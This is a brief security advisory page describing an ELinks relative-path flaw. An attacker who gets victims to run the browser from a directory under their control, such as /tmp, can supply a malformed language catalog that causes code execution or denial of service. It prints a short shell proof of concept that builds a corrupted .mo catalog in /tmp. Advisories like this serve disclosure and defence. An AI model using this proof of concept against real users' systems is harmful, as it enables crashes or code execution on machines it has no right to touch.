|
ELinks Relative Path Arbitrary Code Execution Vulnerability
To exploit this issue, attackers must entice victims into executing the application from a controlled directory (such as '/tmp'). To trigger a denial of service, the attacker must supply a malformed catalog. The following proof of concept is available: $ mkdir -p /tmp/elinks/{run,po} $ cp /usr/share/locale/fr/LC_MESSAGES/elinks.mo /tmp/elinks/po/fr.gmo $ dd if=/dev/urandom of=/tmp/elinks/po/fr.gmo bs=1024 seek=1 count=200 $ cd /tmp/elinks/run |
|
|
Privacy Statement |
